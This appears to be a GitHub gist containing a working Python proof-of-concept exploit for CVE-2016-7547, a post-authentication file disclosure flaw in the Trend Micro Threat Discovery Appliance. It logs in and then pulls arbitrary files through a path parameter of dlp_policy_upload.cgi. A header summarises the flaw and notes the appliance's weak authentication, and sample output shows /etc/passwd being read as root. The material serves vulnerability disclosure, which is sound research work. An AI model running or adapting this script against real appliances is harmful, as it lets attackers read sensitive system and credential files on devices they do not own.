Last active
April 11, 2017 16:05
-
-
Save malerisch/b8764501d299f2ec9eb145258d404e5f to your computer and use it in GitHub Desktop.
CVE-2016-7547 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/local/bin/python | |
""" | |
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure Vulnerability | |
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ | |
File: TDA_InstallationCD.2.6.1062r1.en_US.iso | |
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9 | |
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 | |
Summary: | |
======== | |
There exists a post authenticated file disclosure vulnerability that can be used to leak files as root. | |
Notes: | |
====== | |
- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts... | |
Example: | |
======== | |
saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py | |
(+) usage: ./poc.py <target> <pass> <file> | |
(+) eg: ./poc.py 172.16.175.123 admin /etc/passwd | |
saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py 172.16.175.123 admin123 /etc/passwd | |
(+) logged in... | |
(+) downloading file... | |
root:x:0:0:root:/root:/bin/true | |
tda:x:1:1:nobody:/:/bin/true | |
monitor:x:1:1:nobody:/:/bin/true | |
pcap:x:77:77:tcpdump:/var/log:/bin/true | |
saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py 172.16.175.123 admin123 /var/i_dont_exist | |
(+) logged in... | |
(+) downloading file... | |
(-) file: /var/i_dont_exist doesnt exist! | |
""" | |
import re | |
import sys | |
import requests | |
requests.packages.urllib3.disable_warnings() | |
def remove_last_line_from_string(s): | |
return s[:s.rfind('\r\n')] | |
def download_file(): | |
r = s.get("https://%s/cgi-bin/dlp_policy_upload.cgi?Q_UPLOAD_ID=1&Q_UPLOAD_TEMPLATE=%s" % (t, f), verify=False) | |
data = r.text | |
if len(data) > 52: | |
fdata = str(data).split("\n") | |
fdata.pop() | |
fdata.pop() | |
print '\n'.join(fdata) | |
else: | |
print "(-) file: %s doesnt exist!" % f | |
if len(sys.argv) != 4: | |
print "(+) usage: %s <target> <pass> <file>" % sys.argv[0] | |
print "(+) eg: %s 172.16.175.123 admin /etc/passwd" % sys.argv[0] | |
sys.exit(-1) | |
t = sys.argv[1] | |
p = sys.argv[2] | |
f = sys.argv[3] | |
bu = "https://%s/" % t | |
l_url = "%scgi-bin/logon.cgi" % bu | |
s = requests.Session() | |
r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False) | |
if "frame.cgi" in r.text: | |
print "(+) logged in..." | |
print "(+) downloading file..." | |
download_file() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment